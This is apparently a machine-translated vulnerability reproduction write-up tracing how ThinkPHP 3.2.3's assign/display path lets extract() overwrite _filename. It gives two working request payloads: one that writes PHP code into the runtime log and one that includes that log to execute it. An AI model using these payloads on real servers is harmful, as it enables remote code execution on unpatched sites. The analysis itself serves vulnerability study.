thinkphp3.2.3 The log contains analysis

Entry point modification

The entry point is \Application\Home\Controller\IndexController.class.php in

We will take this initial index Code modification , Here's number 6 That's ok , If not , There will be a little problem , This will be analyzed in detail later

I just started debugging , The first 6 Behavior $this->assign('value',$value);, This leads to a problem , And then we will analyze

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    
    public function index($value=''){
    
        $this->assign($value);
        $this->display();
    }
}

Call flow chart

Debug analysis

assign

First of all to see assign The process of

In the 122 That's ok , Called assign function

ThinkPHP\Library\Think\View.class.php As defined in assign()

You'll find a problem here , This will create a tVar[‘name’]=$value, And this name The value is value, That is why all arrays are nested , This is because my first \Application\Home\Controller\IndexController.class.php There's something wrong with it

We will assign The first parameter of is deleted , So in assign() Function , Will be satisfied if Conditions , Go ahead 38 That's ok

And then execute display When ,tVar Is a key value pair , instead of value There is another key value pair in

display

From the very beginning display Start

And then in ThinkPHP\Library\Think\View.class.php Of the 125 That's ok , Assign a value , take tVar Pass the value to $params

stay ThinkPHP\Library\Think\Hook.class.php Of listen Function , The first 89 That's ok , take $params Pass in exec function

then ThinkPHP\Library\Think\Hook.class.php Of exec in , The first 119 That's ok , take params Pass in run function

stay ThinkPHP\Library\Behavior\ParseTemplateBehavior.class.php Of run Function here ,data In fact, that is params, And then data[‘var’] Pass in fetch function

stay ThinkPHP\Library\Think\Template.class.php in , The first 75 That's ok , Pass in the above data[‘var’] The assignment is this->tVar, then 77 That's ok , take this->tVar Pass in load function

stay ThinkPHP\Library\Think\Storage\Driver\File.class.php pass the civil examinations 77 I'm going to judge , And then again 78 Line progress extract assignment , But because it's a nested array , So it's actually a whole value Array , however value No definition , Such as the variable on the left

So actually this display(), It's the whole thing params, Then pass it all the way , And then use the last 78 Yes extract assignment , Cover _filename, The file contains

My problem is that at the beginning params Is a nested array , One more layer of nesting , That's the problem ！！！

So the first $this->assign('value',$value); Delete the first parameter

poc analysis

m Parameter specifies the folder ,c Parameter specifies the controller ,a Parameter specifies the method ,value Parameters are our controllable parameters

First pass parameters m

index.php?m=--><?=phpinfo();?>

And then in Application\Runtime\Logs\Common\22_06_14.log There's a record in

Get the path of the log file , Then the file contains the execution of arbitrary commands

index.php?m=Home&c=Index&a=index&value[_filename]=.\Application\Runtime\Logs\Common\22_06_14.log

About log file generation

There are two types of log files , The log is recorded in days

Application\Runtime\Logs\Common\22_06_14.log
Application\Runtime\Logs\Home\22_06_14.log

When debug mode is on

Without reporting an error , stay Application\Runtime\Logs\Home\ Generate log in

In case of error , stay Application\Runtime\Logs\Common Generate log in

When debug mode is off

Without reporting an error , No log generation

In case of error , stay Application\Runtime\Logs\Common Generate log in

About payload

index.php?m=Home&c=Index&a=index&value[_filename]=.\Application\Runtime\Logs\Common\22_06_14.log

The three parameters are module , controller , operation

here m Parameter specifies the folder ,c Parameter specifies the controller ,a Parameter specifies the method ,value Parameters are our controllable parameters

thinkphp Using single entry mode to access the application , All requests to the application are directed to the application's entry file , The system will URL Parameter to resolve the current request module 、 Controls and operation , Here's a standard URL Access format ：

The first way of access
http://localhost:/thinkphp/index.php/Home/Index/index　　 Entrance file / modular / controller / operation
The second way to visit ( The parameter )
http://localhost:/thinkphp/index.php?m=Home&c=Index&a=index　　 Pass three parameters

Reference link

1. thinkphp3.2.3 The log file contains the analysis - ProcessOn
2. 【 Vulnerability notification 】ThinkPHP3.2.x RCE Vulnerability notification - cloud + Community - Tencent cloud (tencent.com)
3. ThinkPHP3.2.x RCE Reappear | 0xCreed (jxustctf.top)